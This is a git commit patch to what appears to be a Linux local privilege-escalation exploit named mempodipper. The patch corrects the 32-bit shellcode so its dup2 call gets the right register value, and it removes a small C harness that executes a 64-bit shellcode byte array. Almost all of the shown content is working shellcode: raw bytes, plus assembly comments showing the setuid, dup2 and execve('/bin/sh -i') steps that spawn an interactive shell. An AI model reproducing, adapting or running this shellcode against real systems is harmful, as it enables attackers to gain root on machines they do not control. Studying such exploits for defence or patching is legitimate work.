From 0333d328b7d0115ea68bc988ed0ced479d09ad31 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 22 Jan 2012 06:29:59 +0100
Subject: Right dup value on 32bit.

---
 harness.c      |  7 -------
 mempodipper.c  | 10 +++++-----
 shellcode-32.s |  1 +
 3 files changed, 6 insertions(+), 12 deletions(-)
 delete mode 100644 harness.c

diff --git a/harness.c b/harness.c
deleted file mode 100644
index 10bf6ce..0000000
--- a/harness.c
+++ /dev/null
@@ -1,7 +0,0 @@
-unsigned char buf[] = 
-"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
-"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
-"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
-"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
-"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-void main() { (*(void(*)())buf)(); }
diff --git a/mempodipper.c b/mempodipper.c
index fb20c26..00c6187 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -205,11 +205,11 @@ int main(int argc, char **argv)
 #if defined(__i386__)
 		// See shellcode-32.s in this package for the source.
 		char shellcode[] =
-			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
-			"\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
-			"\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
-			"\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
-
+			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+			"\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+			"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+			"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+			"\x80";
 #elif defined(__x86_64__)
 		// See shellcode-64.s in this package for the source.
 		char shellcode[] =
diff --git a/shellcode-32.s b/shellcode-32.s
index d08b93f..bb29701 100644
--- a/shellcode-32.s
+++ b/shellcode-32.s
@@ -14,6 +14,7 @@ xor ebx,ebx
 mov al,0x2e
 int 0x80
 ;dup2(6, 2)
+xor ecx,ecx
 mov bl,0x6
 mov cl,0x2
 mov al,0x3f
-- 
cgit v1.2.3-59-g8ed1b